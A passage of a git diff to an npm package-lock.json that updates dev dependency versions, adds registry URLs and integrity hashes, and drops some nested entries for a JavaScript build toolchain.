"sha512-G3uJih0XWiID451fpeFaYGVuxHEjzKTHtc9uGFEjR6hHrvNzeS/PX+LLLcetJcytsB5m4j+K3o/EpXJNb/5IEQ==", + "dev": true, + "requires": { + "@babel/helper-define-polyfill-provider": "^0.3.1", + "core-js-compat": "^3.21.0" + } + }, + "babel-plugin-polyfill-regenerator": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-regenerator/-/babel-plugin-polyfill-regenerator-0.3.1.tgz", + "integrity": "sha512-Y2B06tvgHYt1x0yz17jGkGeeMr5FeKUu+ASJ+N6nB5lQ8Dapfg42i0OVrf8PNGJ3zKL4A23snMi1IRwrqqND7A==", + "dev": true, + "requires": { + "@babel/helper-define-polyfill-provider": "^0.3.1" + } }, "chalk": { "version": "4.1.2", @@ -19868,57 +20679,42 @@ "version": "1.1.4", "dev": true }, - "colorette": { - "version": "1.3.0", - "dev": true - }, "commander": { - "version": "8.1.0", + "version": "8.3.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-8.3.0.tgz", + "integrity": "sha512-OkTL9umf+He2DZkUq8f8J9of7yL6RJKI24dVITBmNfZBmri9zYZQrKkuXiKhyfPSu8tUhnVBB1iKXevvnlR4Ww==", "dev": true }, - "core-js-compat": { - "version": "3.16.2", + "debug": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { - "browserslist": "^4.16.7", - "semver": "7.0.0" - }, - "dependencies": { - "browserslist": { - "version": "4.16.8", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001251", - "colorette": "^1.3.0", - "electron-to-chromium": "^1.3.811", - "escalade": "^3.1.1", - "node-releases": "^1.1.75" - } - }, - "semver": { - "version": "7.0.0", - "dev": true - } + "ms": "2.1.2" } }, - "debug": { - "version": "4.3.2", + "fancy-log": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/fancy-log/-/fancy-log-2.0.0.tgz", + "integrity": "sha512-9CzxZbACXMUXW13tS0tI8XsGGmxWzO2DmYrGuBJOJ8k8q2K7hwfJA5qHjuPPe8wtsco33YR9wc+Rlr5wYFvhSA==", "dev": true, "requires": { - "ms": "2.1.2" + "color-support": "^1.1.3" } }, - "electron-to-chromium": { - "version": "1.3.814", - "dev": true - }, - "fs-extra": { - "version": "10.0.0", + "glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", "dev": true, "requires": { - "graceful-fs": "^4.2.0", - "jsonfile": "^6.0.1", - "universalify": "^2.0.0" + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" } }, "has-flag": { @@ -19929,27 +20725,16 @@ "version": "2.3.2", "dev": true }, - "json5": { - "version": "2.2.0", - "dev": true, - "requires": { - "minimist": "^1.2.5" - } - }, - "jsonfile": { - "version": "6.1.0", - "dev": true, - "requires": { - "graceful-fs": "^4.1.6", - "universalify": "^2.0.0" - } + "json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true }, "ms": { "version": "2.1.2", - "dev": true - }, - "node-releases": { - "version": "1.1.75", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true }, "semver": { @@ -19959,14 +20744,6 @@ "lru-cache": "^6.0.0" } }, - "source-map": { - "version": "0.5.7", - "dev": true - }, - "universalify": { - "version": "2.0.0", - "dev": true - }, "uuid": { "version": "8.3.2", "dev": true @@ -19974,23 +20751,96 @@ } }, "@compodoc/live-server": { - "version": "1.2.2", + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@compodoc/live-server/-/live-server-1.2.3.tgz", + "integrity": "sha512-hDmntVCyjjaxuJzPzBx68orNZ7TW4BtHWMnXlIVn5dqhK7vuFF/11hspO1cMmc+2QTYgqde1TBcb3127S7Zrow==", "dev": true, "requires": { "chokidar": "^3.5.2", - "colors": "latest", + "colors": "1.4.0", "connect": "^3.7.0", "cors": "latest", "event-stream": "4.0.1", "faye-websocket": "0.11.x", - "http-auth": "4.1.7", + "http-auth": "4.1.9", "http-auth-connect": "^1.0.5", "morgan": "^1.10.0", "object-assign": "latest", - "open": "8.2.1", + "open": "8.4.0", "proxy-middleware": "latest", "send": "latest", "serve-index": "^1.9.1" + }, + "dependencies": { + "http-errors": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.8.1.tgz", + "integrity": "sha512-Kpk9Sm7NmI+RHhnj6OIWDI1d6fIoFAtFt9RLaTMRlg/8w49juAStsrBgp0Dp4OdxdVbRIeKhtCUvoi/RuAhO4g==", + "dev": true, + "requires": { + "depd": "~1.1.2", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": ">= 1.5.0 < 2", + "toidentifier": "1.0.1" + } + }, + "inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true + }, + "open": { + "version": "8.4.0", + "resolved": "https://registry.npmjs.org/open/-/open-8.4.0.tgz", + "integrity": "sha512-XgFPPM+B28FtCCgSb9I+s9szOC1vZRSwgWsRUA5ylIxRTgKozqjOCrVOqGsYABPYK5qnfqClxZTFBa8PKt2v6Q==", + "dev": true, + "requires": { + "define-lazy-prop": "^2.0.0", + "is-docker": "^2.1.1", + "is-wsl": "^2.2.0" + } + }, + "send": { + "version": "0.17.2", + "resolved": "https://registry.npmjs.org/send/-/send-0.17.2.tgz", + "integrity": "sha512-UJYB6wFSJE3G00nEivR5rgWp8c2xXvJ3OPWPhmuteU0IKj8nKbG3DrjiOmLwpnHGYWAVwA69zmTm++YG0Hmwww==", + "dev": true, + "requires": { + "debug": "2.6.9", + "depd": "~1.1.2", + "destroy": "~1.0.4", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "1.8.1", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "~2.3.0", + "range-parser": "~1.2.1", + "statuses": "~1.5.0" + } + }, + "setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==", + "dev": true + }, + "toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "dev": true + } } }, "@compodoc/ngd-core": { @@ -20021,18 +20871,6 @@ "jsonfile": "^6.0.1", "universalify": "^2.0.0" } - }, - "jsonfile": { - "version": "6.1.0", - "dev": true, - "requires": { - "graceful-fs": "^4.1.6", - "universalify": "^2.0.0" - } - }, - "universalify": { - "version": "2.0.0", - "dev": true } } }, @@ -20046,6 +20884,8 @@ }, "@foliojs-fork/fontkit": { "version": "1.9.1", + "resolved": "https://registry.npmjs.org/@foliojs-fork/fontkit/-/fontkit-1.9.1.tgz", + "integrity": "sha512-U589voc2/ROnvx1CyH9aNzOQWJp127JGU1QAylXGQ7LoEAF6hMmahZLQ4eqAcgHUw+uyW4PjtCItq9qudPkK3A==", "dev": true, "requires": { "@foliojs-fork/restructure": "^2.0.2", @@ -20062,6 +20902,8 @@ }, "@foliojs-fork/linebreak": { "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@foliojs-fork/linebreak/-/linebreak-1.1.1.tgz", + "integrity": "sha512-pgY/+53GqGQI+mvDiyprvPWgkTlVBS8cxqee03ejm6gKAQNsR1tCYCIvN9FHy7otZajzMqCgPOgC4cHdt4JPig==", "dev": true, "requires": { "base64-js": "1.3.1", @@ -20070,7 +20912,9 @@ } }, "@foliojs-fork/pdfkit": { - "version": "0.12.3", + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/@foliojs-fork/pdfkit/-/pdfkit-0.13.0.tgz", + "integrity": "sha512-YXeG1fml9k97YNC9K8e292Pj2JzGt9uOIiBFuQFxHsdQ45BlxW+JU3RQK6JAvXU7kjhjP8rCcYvpk36JLD33sQ==", "dev": true, "requires": { "@foliojs-fork/fontkit": "^1.9.1", @@ -20081,6 +20925,8 @@ }, "@foliojs-fork/restructure": { "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@foliojs-fork/restructure/-/restructure-2.0.2.tgz", + "integrity": "sha512-59SgoZ3EXbkfSX7b63tsou/SDGzwUEK6MuB5sKqgVK1/XE0fxmpsOb9DQI8LXW3KfGnAjImCGhhEb7uPPAUVNA==", "dev": true }, "@istanbuljs/schema": { @@ -20091,6 +20937,30 @@ "version": "1.0.0", "dev": true }, + "@jridgewell/sourcemap-codec": { + "version": "1.4.11", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.11.tgz", + "integrity": "sha512-Fg32GrJo61m+VqYSdRSjRXMjQ06j8YIYfcTqndLYVAaHmroZHLJZCydsWBOTDqXS2v+mjxohBWEMfg97GXmYQg==", + "dev": true + }, + "@jridgewell/trace-mapping": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.4.tgz", + "integrity": "sha512-vFv9ttIedivx0ux3QSjhgtCVjPZd5l46ZOMDSCwnH1yUO2e964gO8LZGyv2QkqcgR6TnBU1v+1IFqmeoG+0UJQ==", + "dev": true, + "requires": { + "@jridgewell/resolve-uri": "^3.0.3", + "@jridgewell/sourcemap-codec": "^1.4.10" + }, + "dependencies": { + "@jridgewell/resolve-uri": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.0.5.tgz", + "integrity": "sha512-VPeQ7+wH0itvQxnG+lIzWgkysKIr3L9sslimFW55rHMdGu/qCQ5z5h9zq4gI8uBtqkpHhsF4Z/OwExufUCThew==", + "dev": true + } + } + }, "@jsdevtools/coverage-istanbul-loader": { "version": "3.0.5", "dev": true, @@ -20254,6 +21124,12 @@ } } }, + "@socket.io/base64-arraybuffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@socket.io/base64-arraybuffer/-/base64-arraybuffer-1.0.2.tgz", + "integrity": "sha512-dOlCBKnDw4iShaIsH/bxujKTM18+2TOAsYz+KSc11Am38H4q5Xw8Bbz97ZYdrVNM+um3p7w86Bvvmcn9q+5+eQ==", + "dev": true + }, "@tootallnate/once": { "version": "1.1.2", "dev": true @@ -20263,10 +21139,12 @@ "dev": true }, "@ts-morph/common": { - "version": "0.10.1", + "version": "0.12.3", + "resolved": "https://registry.npmjs.org/@ts-morph/common/-/common-0.12.3.tgz", + "integrity": "sha512-4tUmeLyXJnJWvTFOKtcNJ1yh0a3SsTLi2MUoyj8iUNznFRN1ZquaNe7Oukqrnki2FzZkm0J9adCNLDZxUzvj+w==", "dev": true, "requires": { - "fast-glob": "^3.2.5", + "fast-glob": "^3.2.7", "minimatch": "^3.0.4", "mkdirp": "^1.0.4", "path-browserify": "^1.0.1" @@ -20274,24 +21152,28 @@ "dependencies": { "mkdirp": { "version": "1.0.4", - "dev": true - }, - "path-browserify": { - "version": "1.0.1", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", "dev": true } } }, "@types/component-emitter": { - "version": "1.2.10", + "version": "1.2.11", + "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.11.tgz", + "integrity": "sha512-SRXjM+tfsSlA9VuG8hGO2nft2p8zjXCK1VcC6N4NXbBbYbSia9kzCChYQajIjzIqOOOuh5Ock6MmV2oux4jDZQ==", "dev": true }, "@types/cookie": { "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-XW/Aa8APYr6jSVVA1y/DEIZX0/GMKLEVekNG727R8cs56ahETkRAy/3DR7+fJyh7oUgGwNQaRfXCun0+KbWY7Q==", "dev": true }, "@types/cors": { "version": "2.8.12", + "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.12.tgz", + "integrity": "sha512-vt+kDhq/M2ayberEtJcIN/hxXy1Pk+59g2FV/ZQceeaTyCtCucjL2Q7FXlFjtWn4n15KCr1NE2lNNFhp0lEThw==", "dev": true }, "@types/eslint": { @@ -20584,6 +21466,8 @@ }, "acorn-node": { "version": "1.8.2", + "resolved": "https://registry.npmjs.org/acorn-node/-/acorn-node-1.8.2.tgz", + "integrity": "sha512-8mt+fslDufLYntIoPAaIMUe/lrbrehIiwmR3t2k9LljIzoigEPF27eLk2hy8zSGzmR/ogr7zbRKINMo1u0yh5A==", "dev": true, "requires": { "acorn": "^7.0.0", @@ -20593,12 +21477,16 @@ "dependencies": { "acorn": { "version": "7.4.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", + "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", "dev": true } } }, "acorn-walk": { "version": "7.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-7.2.0.tgz", + "integrity": "sha512-OPdCF6GsMIP+Az+aWfAAOEt2/+iVDKE7oy6lJ098aoe59oAmK76qV6Gw60SbZ8jHuG2wH058GF4pLFbYamYrVA==", "dev": true }, "adjust-sourcemap-loader": { @@ -20698,6 +21586,8 @@ }, "amdefine": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/amdefine/-/amdefine-1.0.1.tgz", + "integrity": "sha1-SlKCrBZHKek2Gbz9OtFR+BfOkfU=", "dev": true, "optional": true }, @@ -20746,6 +21636,8 @@ }, "apache-crypt": { "version": "1.2.5", + "resolved": "https://registry.npmjs.org/apache-crypt/-/apache-crypt-1.2.5.tgz", + "integrity": "sha512-ICnYQH+DFVmw+S4Q0QY2XRXD8Ne8ewh8HgbuFH4K7022zCxgHM0Hz1xkRnUlEfAXNbwp1Cnhbedu60USIfDxvg==", "dev": true, "requires": { "unix-crypt-td-js": "^1.1.4" @@ -20753,6 +21645,8 @@ }, "apache-md5": { "version": "1.1.7", + "resolved": "https://registry.npmjs.org/apache-md5/-/apache-md5-1.1.7.tgz", + "integrity": "sha512-JtHjzZmJxtzfTSjsCyHgPR155HBe5WGyUyHTaEkfy46qhwCFKx1Epm6nAxgUG3WfUZP1dWhGqj9Z2NOBeZ+uBw==", "dev": true }, "app-root-path": { @@ -20808,6 +21702,8 @@ }, "array-from": { "version": "2.1.1", + "resolved": "https://registry.npmjs.org/array-from/-/array-from-2.1.1.tgz", + "integrity": "sha1-z+nYwmYoudxa7MYqn12PHzUsEZU=", "dev": true }, "array-union": { @@ -20841,6 +21737,8 @@ }, "ast-transform": { "version": "0.0.0", + "resolved": "https://registry.npmjs.org/ast-transform/-/ast-transform-0.0.0.tgz", + "integrity": "sha1-dJRAWIh9goPhidlUYAlHvJj+AGI=", "dev": true, "requires": { "escodegen": "~1.2.0", @@ -20848,40 +21746,18 @@ "through": "~2.3.4" }, "dependencies": { - "escodegen": { - "version": "1.2.0", - "dev": true, - "requires": { - "esprima": "~1.0.4", - "estraverse": "~1.5.0", - "esutils": "~1.0.0", - "source-map": "~0.1.30" - } - }, "esprima": { "version": "1.0.4", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-1.0.4.tgz", + "integrity": "sha1-n1V+CPw7TSbs6d00+Pv0drYlha0=", "dev": true - }, - "estraverse": { - "version": "1.5.1", - "dev": true - }, - "esutils": { - "version": "1.0.0", - "dev": true - }, - "source-map": { - "version": "0.1.43", - "dev": true, - "optional": true, - "requires": { - "amdefine": ">=0.0.4" - } } } }, "ast-types": { "version": "0.7.8", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.7.8.tgz", + "integrity": "sha1-kC0uDWDQcb3NRtwRXhgJ7RHBOKk=", "dev": true }, "ast-types-flow": { @@ -21027,25 +21903,7 @@ "version": "0.2.2", "dev": true, "requires": { - "@babel/helper-define-polyfill-provider": "^0.2.2" - } - }, - "babel-runtime": { - "version": "6.26.0", - "dev": true, - "requires": { - "core-js": "^2.4.0", - "regenerator-runtime": "^0.11.0" - }, - "dependencies": { - "core-js": { - "version": "2.6.12", - "dev": true - }, - "regenerator-runtime": { - "version": "0.11.1", - "dev": true - } + "@babel/helper-define-polyfill-provider": "^0.2.2" } }, "balanced-match": { @@ -21073,20 +21931,20 @@ } } }, - "base64-arraybuffer": { - "version": "0.1.4", - "dev": true - }, "base64-js": { "version": "1.3.1", "dev": true }, "base64id": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", + "integrity": "sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==", "dev": true }, "basic-auth": { "version": "2.0.1", + "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", + "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", "dev": true, "requires": { "safe-buffer": "5.1.2" @@ -21104,6 +21962,8 @@ }, "bcryptjs": { "version": "2.4.3", + "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", + "integrity": "sha1-mrVie5PmBiH/fNrF2pczAn3x0Ms=", "dev": true }, "big.js": { @@ -21113,6 +21973,16 @@ "binary-extensions": { "version": "2.1.0" }, + "bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "dev": true, + "optional": true, + "requires": { + "file-uri-to-path": "1.0.0" + } + }, "bl": { "version": "4.1.0", "dev": true, @@ -21211,6 +22081,8 @@ }, "brfs": { "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brfs/-/brfs-2.0.2.tgz", + "integrity": "sha512-IrFjVtwu4eTJZyu8w/V2gxU7iLTtcHih67sgEdzrhjLBMHp2uYefUBfdM4k2UvcuWMgV7PQDZHSLeNWnLFKWVQ==", "dev": true, "requires": { "quote-stream": "^1.0.1", @@ -21221,6 +22093,8 @@ }, "brotli": { "version": "1.3.2", + "resolved": "https://registry.npmjs.org/brotli/-/brotli-1.3.2.tgz", + "integrity": "sha1-UlqcrU/LqWR119OI9q7LE+7VL0Y=", "dev": true, "requires": { "base64-js": "^1.1.2" @@ -21228,6 +22102,8 @@ }, "browser-resolve": { "version": "1.11.3", + "resolved": "https://registry.npmjs.org/browser-resolve/-/browser-resolve-1.11.3.tgz", + "integrity": "sha512-exDi1BYWB/6raKHmDTCicQfTkqwN5fioMFV4j8BsfMU4R2DK/QfZfK7kOVkmWCNANf0snkBzqGqAJBao9gZMdQ==", "dev": true, "requires": { "resolve": "1.1.7" @@ -21235,12 +22111,16 @@ "dependencies": { "resolve": { "version": "1.1.7", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.1.7.tgz", + "integrity": "sha1-IDEU2CrSxe2ejgQRs5ModeiJ6Xs=", "dev": true } } }, "browserify-optional": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/browserify-optional/-/browserify-optional-1.0.1.tgz", + "integrity": "sha1-HhNyLP3g2F8SFnbCpyztUzoBiGk=", "dev": true, "requires": { "ast-transform": "0.0.0", @@ -21249,13 +22129,22 @@ } }, "browserslist": { - "version": "4.16.6", + "version": "4.19.3", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.19.3.tgz", + "integrity": "sha512-XK3X4xtKJ+Txj8G5c30B4gsm71s69lqXlkYui4s6EkKxuv49qjYlY6oVd+IFJ73d4YymtM3+djvvt/R/iJwwDg==", "requires": { - "caniuse-lite": "^1.0.30001219", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.723", + "caniuse-lite": "^1.0.30001312", + "electron-to-chromium": "^1.4.71", "escalade": "^3.1.1", - "node-releases": "^1.1.71" + "node-releases": "^2.0.2", + "picocolors": "^1.0.0" + }, + "dependencies": { + "picocolors": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", + "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==" + } } }, "browserstack": { @@ -21275,6 +22164,8 @@ }, "buffer-equal": { "version": "0.0.1", + "resolved": "https://registry.npmjs.org/buffer-equal/-/buffer-equal-0.0.1.tgz", + "integrity": "sha1-kbx0sR6kBbyRa8aqkI+q+ltKrEs=", "dev": true }, "buffer-from": { @@ -21351,6 +22242,8 @@ }, "callsite": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/callsite/-/callsite-1.0.0.tgz", + "integrity": "sha1-KAOY5dZkvXQDi28JBRU+borxvCA=", "dev": true }, "camelcase": { @@ -21368,7 +22261,9 @@ } }, "caniuse-lite": { - "version": "1.0.30001239" + "version": "1.0.30001312", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001312.tgz", + "integrity": "sha512-Wiz1Psk2MEK0pX3rUzWaunLTZzqS2JYZFzNKqAiJGiuxIjRPLgV6+VDPOg6lQOUxmDwhTlh198JsTTi8Hzw6aQ==" }, "canonical-path": { "version": "1.0.0" @@ -21423,6 +22318,14 @@ "is-glob": "~4.0.1", "normalize-path": "~3.0.0", "readdirp": "~3.6.0" + }, + "dependencies": { + "fsevents": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", + "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "optional": true + } } }, "chownr": { @@ -21554,8 +22457,13 @@ } }, "code-block-writer": { - "version": "10.1.1", - "dev": true + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/code-block-writer/-/code-block-writer-11.0.0.tgz", + "integrity": "sha512-GEqWvEWWsOvER+g9keO4ohFoD3ymwyCnqY3hoTr7GZipYFwEhMHJw+TtV0rfgRhNImM6QWZGO2XYjlJVyYT62w==", + "dev": true, + "requires": { + "tslib": "2.3.1" + } }, "code-point-at": { "version": "1.1.0", @@ -21635,7 +22543,8 @@ "dev": true }, "colorette": { - "version": "1.2.2" + "version": "1.2.2", + "dev": true }, "colors": { "version": "1.4.0", @@ -21684,6 +22593,8 @@ }, "concat-stream": { "version": "1.6.2", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", "dev": true, "requires": { "buffer-from": "^1.0.0", @@ -21726,7 +22637,9 @@ } }, "cookie": { - "version": "0.4.1", + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz", + "integrity": "sha512-aSWTXFzaKWkvHO1Ny/s+ePFpvKsPnjc551iI41v3ny/ow6tBG5Vd+FuqGNhh1LxOmVzOlGUriIlOaokOvhaStA==", "dev": true }, "cookie-signature": { @@ -21785,10 +22698,12 @@ "version": "3.18.3" }, "core-js-compat": { - "version": "3.15.1", + "version": "3.21.1", + "resolved": "https://registry.npmjs.org/core-js-compat/-/core-js-compat-3.21.1.tgz", + "integrity": "sha512-gbgX5AUvMb8gwxC7FLVWYT7Kkgu/y7+h/h1X43yJkNqhlK2fuYyQimqvKGNZFAY6CKii/GFKJ2cp/1/42TN36g==", "dev": true, "requires": { - "browserslist": "^4.16.6", + "browserslist": "^4.19.1", "semver": "7.0.0" }, "dependencies": { @@ -21803,6 +22718,8 @@ }, "cors": { "version": "2.8.5", + "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.5.tgz", + "integrity": "sha512-KIHbLJqu73RGr/hnbrO9uBeixNGuvSQjul/jdFvS/KFSIH1hWVd1ng7zOHx+YrEfInLG7q4n6GHQ9cDtxv/P6g==", "dev": true, "requires": { "object-assign": "^4", @@ -21898,6 +22815,8 @@ }, "crypto-js": { "version": "4.1.1", + "resolved": "https://registry.npmjs.org/crypto-js/-/crypto-js-4.1.1.tgz", + "integrity": "sha512-o2JlM7ydqd3Qk9CA0L4NL6mTzU2sdx96a+oOfPu8Mkl/PK51vSyoi8/rQ8NknZtk44vq15lmhAj9CIAGwgeWKw==", "dev": true }, "css": { @@ -22214,6 +23133,8 @@ }, "d": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/d/-/d-1.0.1.tgz", + "integrity": "sha512-m62ShEObQ39CfralilEQRjH6oAMtNCV1xJyEx5LpRYUVN+EviphDgUc/F3hnYbADmkiNs67Y+3ylmlG7Lnu+FA==", "dev": true, "requires": { "es5-ext": "^0.10.50", @@ -22225,7 +23146,9 @@ "dev": true }, "dash-ast": { - "version": "1.0.0", + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/dash-ast/-/dash-ast-2.0.1.tgz", + "integrity": "sha512-5TXltWJGc+RdnabUGzhRae1TRq6m4gr+3K2wQX0is5/F2yS6MJXJvLyI3ErAnsAXuJoGqvfVD5icRgim07DrxQ==", "dev": true }, "dashdash": { @@ -22235,7 +23158,9 @@ } }, "date-format": { - "version": "3.0.0", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/date-format/-/date-format-4.0.3.tgz", + "integrity": "sha512-7P3FyqDcfeznLZp2b+OMitV9Sz2lUnsT87WaTat9nVwqsBkTzPG3lPLNwW3en6F4pHUiWzr6vb8CLhjdK9bcxQ==", "dev": true }, "debug": { @@ -22245,7 +23170,9 @@ } }, "decache": { - "version": "4.6.0", + "version": "4.6.1", + "resolved": "https://registry.npmjs.org/decache/-/decache-4.6.1.tgz", + "integrity": "sha512-ohApBM8u9ygepJCjgBrEZSSxPjc0T/PJkD+uNyxXPkqudyUpdXpwJYp0VISm2WrPVzASU6DZyIi6BWdyw7uJ2Q==", "dev": true, "requires": { "callsite": "^1.0.0" @@ -22272,7 +23199,9 @@ } }, "deep-is": { - "version": "0.1.3", + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", "dev": true }, "default-gateway": { @@ -22434,6 +23363,8 @@ }, "dfa": { "version": "1.2.0", + "resolved": "https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz", + "integrity": "sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==", "dev": true }, "di": { @@ -22518,10 +23449,14 @@ }, "duplexer": { "version": "0.1.2", + "resolved": "https://registry.npmjs.org/duplexer/-/duplexer-0.1.2.tgz", + "integrity": "sha512-jtD6YG370ZCIi/9GTaJKQxWTZD045+4R4hTk/x1UyoqadyJ9x9CgSi1RlVDQF8U2sxLLSnFkCaMihqljHIWgMg==", "dev": true }, "duplexer2": { "version": "0.1.4", + "resolved": "https://registry.npmjs.org/duplexer2/-/duplexer2-0.1.4.tgz", + "integrity": "sha1-ixLauHjA1p4+eJEFFmKjL8a93ME=", "dev": true, "requires": { "readable-stream": "^2.0.2" @@ -22538,7 +23473,9 @@ "version": "1.1.1" }, "electron-to-chromium": { - "version": "1.3.756" + "version": "1.4.71", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.71.tgz", + "integrity": 